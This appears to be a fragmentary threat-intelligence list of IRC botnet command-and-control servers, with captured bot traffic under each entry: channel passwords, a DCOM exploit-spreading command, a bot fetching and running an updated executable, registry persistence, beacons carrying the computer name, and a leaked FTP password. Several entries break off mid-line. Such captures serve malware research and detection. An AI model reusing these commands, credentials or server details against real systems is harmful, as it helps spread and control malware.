95.154.242.89

95.154.242.89:4244:
:HTTP1.4 302 FRA|2045414 :FRA|2045414=+gfgjbblu@41.141.112.125
:FRA|2045414!gfgjbblu@41.141.112.125 JOIN :##neo##
:HTTP1.4 332 FRA|2045414 ##neo## :&psniff on
:HTTP1.4 333 FRA|2045414 ##neo## Coded 1288523091
:HTTP1.4 302 FRA|2045414 :FRA|2045414=+gfgjbblu@41.141.112.125
:HTTP1.4 302 FRA|2045414 :FRA|2045414=+gfgjbblu@41.141.112.125

72.20.51.198

72.20.51.198:6667:
JOIN #die chanpass
MODE [FRA|00|P|88890] -ix
JOIN #die chanpass
MODE [FRA|00|P|88890] -ix
JOIN #die chanpass
MODE [FRA|00|P|88890] -ix
JOIN #die chanpass

Fooker.net

78.129.228.56:65267:
JOIN #NzM# screwu
nick:[M]ESP|00|XP|SP3|9898708
[M]ESP|00|XP|SP3|3576563 #NzM# :.root.start dcom135 200 0 0 219.x.x.x -a -r -s
:Fooker.net 333 [M]ESP|00|XP|SP3|3576563 #NzM# weebz

1.sarkievi.net

Remote Host Port Number
212.175.158.43 6667 PASS lnx
Resolved : [1.sarkievi.net] To [212.175.158.43]
MODE [00|USA|227819] -ix
JOIN #Cd# NhG
NICK [00|USA|227819]
USER XP-7853 * 0 :COMPUTERNAME
Now talking in #Cd#
Topic On: [ #Cd# ] [ .msn.msg Foto :D http://to.ly/7Lkw?= ]
Topic By: [ Samuray ]
Other details
* The following port was open in

46.4.245.19

Remote Host Port Number
46.4.245.19 6667
NICK n{USA|XP}303134
USER 3031 "" "TsGh" :3031
JOIN #Awesome leonanenad15963
PONG :BoTNeT.GoV
Other details
* The following port was open in the system:
Port Protocol Process
1053 TCP taskeng.exe (%AppData%\taskeng.exe)
Registry Modifications
* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ Windows Update System = "%AppData%\taskeng.exe"
so that

109.235.49.236

Remote Host Port Number
109.235.49.157 80
109.235.49.236 21
109.235.49.236 35254
* The data identified by the following URLs was then requested from the remote web server:
o http://global-blog.net/2.php?p1=COMPUTERNAME_cnew05ORTN&p2=..
o http://global-blog.net/2.php?p1=COMPUTERNAME_cnew05ORTN&p2=.
USER rnew05@net4speed.net
USER cnew05@net4speed.net
00000000 | 5041 5353 2063 6E25 7724 7033 3364 4021 | PASS cn%w$p33d@!
00000010 | 40E0 E133 3432 0D0A 5057 440D

67.202.108.130

Remote Host Port Number
67.202.108.130 6567 s1m0n3t4
67.202.109.164 80
MODE [SI|USA|00|P|34779] -ix
JOIN #nuevocsm# c1rc0dus0leil
PRIVMSG #nuevocsm# :[Dl]: File download: 84.0KB to: C:\DOCUME~1\UserName\LOCALS~1\Temp\eraseme_83035.exe @ 84.0KB/sec.
QUIT [Update]: Updating to new bin.
NICK [SI|USA|00|P|51927]
USER XP-2630 * 0 :COMPUTERNAME
MODE [SI|USA|00|P|51927] -ix
JOIN #xd# c1rc0dus0leil
NICK [SI|USA|00|P|34779]
USER XP-7375 * 0 :COMPUTERNAME
MODE [SI|USA|00|P|38552] -ix
JOIN

200.164.228.252(Slice’s botnet)

Remote Host Port Number
200.164.228.252 31337 pass 1a2z3a4za6z5s6x5
NICK ^[USA]-[XP-SP2]-069721
USER 1360 "" "lol" :1360
PONG :412CF8FD
JOIN #jklolimawasp## 1a2z3a4za6z5s6x5
PRIVMSG #jklolimawasp## : Bot killed from the system!
Now talking in #jklolimawasp##
Topic On: [ #jklolimawasp## ] [ !msn lol omfg. watch this http://www.ibrokemyinter.net/clips/ ]
Topic By: [ nickserv ]
Modes On: [ #jklolimawasp## ]

61.86.5.250

Remote Host Port Number
61.86.5.250 3305 PASS secretpass
NICK P|vd0dk5h1i
USER s0ppm59wh * 0 :USA|XP|549
USERHOST P|vd0dk5h1i
MODE P|vd0dk5h1i
JOIN #s echo
Other details
* The following ports were open in the system:
Port Protocol Process
1057 TCP uninstall_.exe (%FontsDir%\uninstall_.exe)
1089 TCP uninstall_.exe (%FontsDir%\uninstall_.exe)
1090 TCP uninstall_.exe (%FontsDir%\uninstall_.exe)
1091 TCP uninstall_.exe (%FontsDir%\uninstall_.exe)
1092 TCP uninstall_.exe

updateserver.net(Burimi big hecker)

Remote Host Port Number
109.123.108.61 81 ircd here
200.54.145.171 81 ircd here
88.208.209.166 81 ircd here
67.195.140.222 80
Resolved : [updateserver.net] To [88.208.209.166]
Resolved : [updateserver.net] To [109.123.108.61]
PONG :hub.not.found
NICK n[USA|XP|COMPUTERNAME]ajudsuq
USER n "" "lol" :n
JOIN #biz#
PONG 422
NICK n[USA|XP]1167074
PONG :request2.not.found
USER s "" "lol" :s
JOIN #newbin#
* The data